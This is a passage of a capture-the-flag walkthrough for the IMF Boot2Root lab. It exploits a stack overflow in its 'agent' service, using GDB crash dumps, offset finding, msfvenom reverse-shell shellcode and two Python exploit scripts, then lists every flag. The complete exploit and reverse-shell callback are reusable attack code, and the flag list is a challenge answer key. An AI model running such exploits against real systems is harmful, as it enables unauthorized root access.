Report: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Submitted for review.
Segmentation fault (core dumped)
BINGO!
So running it under GDB (with PEDA) on Kali:
Enter report update: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Report: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Submitted for review.
Program received signal SIGSEGV, Segmentation fault.
[———————————-registers———————————–]
EAX: 0xffffd254 ('a' <repeats 152 times>, "T\322\377\377", 'a' <repeats 44 times>...)
EBX: 0x0
ECX: 0xf7fa4890 --> 0x0
EDX: 0x16
ESI: 0xf7fa3000 --> 0x1d9d6c
EDI: 0xf7fa3000 --> 0x1d9d6c
EBP: 0x61616161 ('aaaa')
ESP: 0xffffd300 ('a' <repeats 200 times>...)
EIP: 0x61616161 ('aaaa')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[————————————-code————————————-]
Invalid $PC address: 0x61616161
[————————————stack————————————-]
0000| 0xffffd300 ('a' <repeats 200 times>...)
0004| 0xffffd304 ('a' <repeats 200 times>...)
0008| 0xffffd308 ('a' <repeats 200 times>...)
0012| 0xffffd30c ('a' <repeats 200 times>...)
0016| 0xffffd310 ('a' <repeats 200 times>...)
0020| 0xffffd314 ('a' <repeats 200 times>...)
0024| 0xffffd318 ('a' <repeats 200 times>...)
0028| 0xffffd31c ('a' <repeats 200 times>...)
[——————————————————————————]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x61616161 in ?? ()
EIP is fully controlled. To find the offset, I create a unique pattern using Metasploit:
root@kali:~/boxes/imf# /usr/bin/msf-pattern_create -l 300 > unique.txt
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3
Enter report update: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Report: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Submitted for review.
Program received signal SIGSEGV, Segmentation fault.
[———————————-registers———————————–]
EAX: 0xffffd254 ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9AfT\322\377\377Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag"...)
EBX: 0x0
ECX: 0xf7fa4890 --> 0x0
EDX: 0x16
ESI: 0xf7fa3000 --> 0x1d9d6c
EDI: 0xf7fa3000 --> 0x1d9d6c
EBP: 0x35664134 ('4Af5')
ESP: 0xffffd300 ("f7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9")
EIP: 0x41366641 ('Af6A')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[————————————-code————————————-]
Invalid $PC address: 0x41366641
[————————————stack————————————-]
0000| 0xffffd300 ("f7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9")
0004| 0xffffd304 ("8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9")
0008| 0xffffd308 ("Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9")
0012| 0xffffd30c ("g1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9")
0016| 0xffffd310 ("2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9")
0020| 0xffffd314 ("Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9")
0024| 0xffffd318 ("g5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9")
0028| 0xffffd31c ("6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9")
[——————————————————————————]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41366641 in ?? ()
gdb-peda$ info frame
Stack level 0, frame at 0xffffd304:
eip = 0x41366641; saved eip = 0x66413766
called by frame at 0xffffd308
Arglist at 0xffffd2fc, args:
Locals at 0xffffd2fc, Previous frame’s sp is 0xffffd304
Saved registers:
eip at 0xffffd300
Then identify the offset of the saved return address from the value that landed in EIP:
root@kali:~/boxes/imf# /usr/bin/msf-pattern_offset -q 41366641
[*] Exact match at offset 168
So now I can start building the exploit. First a reverse-shell payload, excluding the bytes that would break the input (\x00, \x0a, \x0d):
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.11 LPORT=4444 -f python -b "\x00\x0a\x0d"
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of python file: 479 bytes
buf = b""
buf += b"\xbf\x55\xf0\xbc\x40\xda\xcc\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x12\x31\x7a\x12\x83\xc2\x04\x03\x2f\xfe\x5e"
buf += b"\xb5\xfe\x25\x69\xd5\x53\x99\xc5\x70\x51\x94\x0b\x34"
buf += b"\x33\x6b\x4b\xa6\xe2\xc3\x73\x04\x94\x6d\xf5\x6f\xfc"
buf += b"\xad\xad\x90\xf7\x45\xac\x90\x16\xca\x39\x71\xa8\x94"
buf += b"\x69\x23\x9b\xeb\x89\x4a\xfa\xc1\x0e\x1e\x94\xb7\x21"
buf += b"\xec\x0c\x20\x11\x3d\xae\xd9\xe4\xa2\x7c\x49\x7e\xc5"
buf += b"\x30\x66\x4d\x86"
Let's build exploit.py. I run it from my Kali box, as the target only has python3 and I had issues there concatenating bytes and text; using bytes literals (b"...") everywhere, as below, avoids that and the script then runs on either Python version. For the return address I use 0x08048563, a call eax gadget in the binary's own code: at the crash EAX points at the start of the report buffer (see the register dump above), so call eax lands on the shellcode placed at the beginning of the payload, and since agent is a non-PIE 32-bit executable this address is not affected by ASLR on the target.
#!/usr/bin/python
import socket

host = "192.168.0.18"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 7788))
s.recv(1024)
# Sending the Agent ID
s.send(b"48093572\n")
s.recv(1024)
# Select menu option 3 (Submit Report)
s.send(b"3\n")
s.recv(1024)

# Return address 0x08048563 (call eax), little-endian
ret = b"\x63\x85\x04\x08"
# Reverse shell from msfvenom (95 bytes, bad chars \x00\x0a\x0d excluded)
buf = b""
buf += b"\xbf\x55\xf0\xbc\x40\xda\xcc\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x12\x31\x7a\x12\x83\xc2\x04\x03\x2f\xfe\x5e"
buf += b"\xb5\xfe\x25\x69\xd5\x53\x99\xc5\x70\x51\x94\x0b\x34"
buf += b"\x33\x6b\x4b\xa6\xe2\xc3\x73\x04\x94\x6d\xf5\x6f\xfc"
buf += b"\xad\xad\x90\xf7\x45\xac\x90\x16\xca\x39\x71\xa8\x94"
buf += b"\x69\x23\x9b\xeb\x89\x4a\xfa\xc1\x0e\x1e\x94\xb7\x21"
buf += b"\xec\x0c\x20\x11\x3d\xae\xd9\xe4\xa2\x7c\x49\x7e\xc5"
buf += b"\x30\x66\x4d\x86"
# Pad the 95-byte shellcode up to the 168-byte offset with NOPs, then overwrite the saved EIP
pad = b"\x90" * 73
buffer = buf + pad + ret
s.send(buffer)
s.recv(1024)
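The same exploit, reworked as an added example (mine, not the post's): it reproduces what msf-pattern_create and msf-pattern_offset do to confirm the 168-byte offset from the EIP value in the crash dump, builds the payload with a bad-character check against the set given to msfvenom, and drives the agent service with bytes throughout so it runs unchanged under Python 3. The agent ID, port, offset, return address and shellcode are the values from above; port 7788 must be reachable from the attacking box.

```python
import socket
import string
import struct

# Reverse-shell shellcode from the msfvenom run above (linux/x86/shell_reverse_tcp to
# 192.168.0.11:4444, shikata_ga_nai encoded, 95 bytes).
SHELLCODE = (
    b"\xbf\x55\xf0\xbc\x40\xda\xcc\xd9\x74\x24\xf4\x5a\x2b"
    b"\xc9\xb1\x12\x31\x7a\x12\x83\xc2\x04\x03\x2f\xfe\x5e"
    b"\xb5\xfe\x25\x69\xd5\x53\x99\xc5\x70\x51\x94\x0b\x34"
    b"\x33\x6b\x4b\xa6\xe2\xc3\x73\x04\x94\x6d\xf5\x6f\xfc"
    b"\xad\xad\x90\xf7\x45\xac\x90\x16\xca\x39\x71\xa8\x94"
    b"\x69\x23\x9b\xeb\x89\x4a\xfa\xc1\x0e\x1e\x94\xb7\x21"
    b"\xec\x0c\x20\x11\x3d\xae\xd9\xe4\xa2\x7c\x49\x7e\xc5"
    b"\x30\x66\x4d\x86"
)
BADCHARS = b"\x00\x0a\x0d"  # the set excluded with msfvenom -b above


def pattern_create(length: int) -> bytes:
    """Cyclic pattern identical to msf-pattern_create: 'Aa0Aa1...' (upper, lower, digit)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(eip: int, length: int = 300):
    """Offset of the four bytes that ended up in EIP (read little-endian), like msf-pattern_offset -q."""
    idx = pattern_create(length).find(struct.pack("<I", eip))
    return None if idx == -1 else idx


def build_payload(shellcode: bytes, offset: int, ret: int, nop: bytes = b"\x90") -> bytes:
    """shellcode, NOP padding up to the saved-EIP offset, then the return address (little-endian)."""
    if len(shellcode) > offset:
        raise ValueError("shellcode is %d bytes but only %d fit before EIP" % (len(shellcode), offset))
    payload = shellcode + nop * (offset - len(shellcode)) + struct.pack("<I", ret)
    bad = sorted({c for c in payload if c in BADCHARS})
    if bad:
        raise ValueError("payload contains bad chars: %s" % ", ".join("\\x%02x" % c for c in bad))
    return payload


def exploit(host: str, payload: bytes, port: int = 7788, agent_id: bytes = b"48093572") -> None:
    """Walk the agent menu over the network and deliver the overflow, all as bytes."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.recv(1024)                 # banner and "Agent ID :" prompt
        s.sendall(agent_id + b"\n")
        s.recv(1024)                 # "Login Validated" and the menu
        s.sendall(b"3\n")            # 3. Submit Report
        s.recv(1024)                 # "Enter report update:"
        s.sendall(payload)
        try:
            s.recv(1024)             # the shell connects back; this only drains any reply
        except socket.timeout:
            pass


if __name__ == "__main__":
    import sys
    offset = pattern_offset(0x41366641)       # EIP value from the PEDA crash dump above
    payload = build_payload(SHELLCODE, offset, 0x08048563)
    print("offset %d, payload %d bytes" % (offset, len(payload)))
    if len(sys.argv) > 1:                      # python3 agent_exploit.py 192.168.0.18
        exploit(sys.argv[1], payload)
```

The saved EIP reported by info frame above, 0x66413766, maps to offset 172 with the same function, which is consistent with the 168-byte offset plus the 4 bytes of the overwritten return address.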
Running ./exploit.py with the listener on port 4444:
Bingo!
root@kali:~/boxes/imf# nc -nvlp 4444
listening on [any] 4444 …
connect to [192.168.0.11] from (UNKNOWN) [192.168.0.18] 54970
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
Flag.txt
TheEnd.txt
cat Flag.txt
flag6{R2gwc3RQcm90MGMwbHM=}
cat TheEnd.txt
____ _ __ __
/ _/_ _ ___ ___ ___ ___ (_) / / /__
_/ // ‘ \/ _ \/ _ \(_-<(_-</ / _ \/ / -_)
/___/_/_/_/ .__/\___/___/___/_/_.__/_/\__/
__ __/_/ _
/ |/ (_)__ ___ (_)__ ___
/ /|_/ / (_-<(_-</ / _ \/ _ \
/_/__/_/_/___/___/_/\___/_//_/
/ __/__ ___________
/ _// _ \/ __/ __/ -_)
/_/ \___/_/ \__/\__/
Congratulations on finishing the IMF Boot2Root CTF. I hope you enjoyed it.
Thank you for trying this challenge and please send any feedback.
Geckom
Twitter: @g3ck0ma
Email: geckom@redteamr.com
Web: http://redteamr.com
Special Thanks
Binary Advice: OJ (@TheColonial) and Justin Stevens (@justinsteven)
Web Advice: Menztrual (@menztrual)
Testers: dook (@dooktwit), Menztrual (@menztrual), llid3nlq and OJ(@TheColonial)
All the flags and their decoded versions:
flag1{YWxsdGhlZmlsZXM=}
allthefiles
flag2{aW1mYWRtaW5pc3RyYXRvcg==}
imfadministrator
flag3{Y29udGludWVUT2Ntcw==}
continueTOcms
flag4{dXBsb2Fkcjk0Mi5waHA=}
uploadr942.php
flag5{YWdlbnRzZXJ2aWNlcw==}
agentservices
flag6{R2gwc3RQcm90MGMwbHM=}
Gh0stProt0c0ls